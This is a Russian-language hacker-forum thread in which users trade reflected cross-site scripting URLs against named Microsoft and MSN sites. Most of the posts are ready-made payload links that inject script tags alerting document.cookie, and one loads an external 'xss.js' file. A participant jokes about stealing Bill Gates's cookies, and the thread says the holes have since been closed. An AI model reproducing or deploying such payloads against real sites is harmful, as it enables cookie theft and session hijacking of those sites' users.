XSS на MICROSOFT.com и других крупных порталах

[Robin Gud]

Была найдена уязвимость человеком с ником WIN95.CIH...
А вот сама и xss:

http://search.microsoft.com/results.aspx?q=jjj%22%3E%5Bxss%5D&l=2&s100=on&OtherSite=jjj%22%3E%3Cscript%3Ealert("Special for xss.pro/")%3C/script%3E&mkt=en-US&FORM=QBMA

Думаю быстро закроют.

 

[St.]

уже закрыли походу (( а нет, пашет =)

 

[Ma-stiff]

St.
Пашет-пашет

 

[Robin Gud]

Будем cookies у дяди Билла воровать... humbsup:

 

[m4rrow]

Недумал, что такое когда-нибудь случится))

 

[not null]

Дабы не заводить новой темы...msn тоже где-то рядом
msn.com cross site scripting

http://newsletters.msn.com/hm/HMError.asp?CB=[problem is here]

 

[not null]

С кем не бывает
XSS на microsoft.com
http://forums.microsoft.com/MSDN/Search/Se...t%3E&ForumID=45

 

[not null]

XSS на msn.com

http://www.msnbc.msn.com/id/8903091?qp=70686&qt=%27%3E%253cscript%253ealert(%27xss%27)%253c%252fscript%253e

 

[cOOper]

А кто нашел?

 

[not null]

Огромное количество XSS было обнаружено на MSN

http://realtor.realestate.msn.com/Default.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss=loc&ad=http%3A%2F%2Frealtor.realestate.msn.com%2FFindNeig%2Fdefault.asp%3Flnksrc%3DREALR2LF2C0058%26poe%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/SiteMap.asp?lnksrc=RDC-NAV-0005&poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/RealtyTimes/marketconditions.asp?link=http://yoursite/xss.js?open&pID=r.com2

http://realtor.realestate.msn.com/PersPlanOut/ArticleEmail.asp?anm=REALTOR%2Ecom%3A+Real+Estate+101&alnk=http%3A%2F%2Frealtor%2Erealestate%2Emsn%2Ecom%2Fbasics%2Findex%2Easp%3Flnksrc%3DREALR2LF2C0039%26poe%3D%22%3E%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E

И много других.
В настоящее время все закрыты.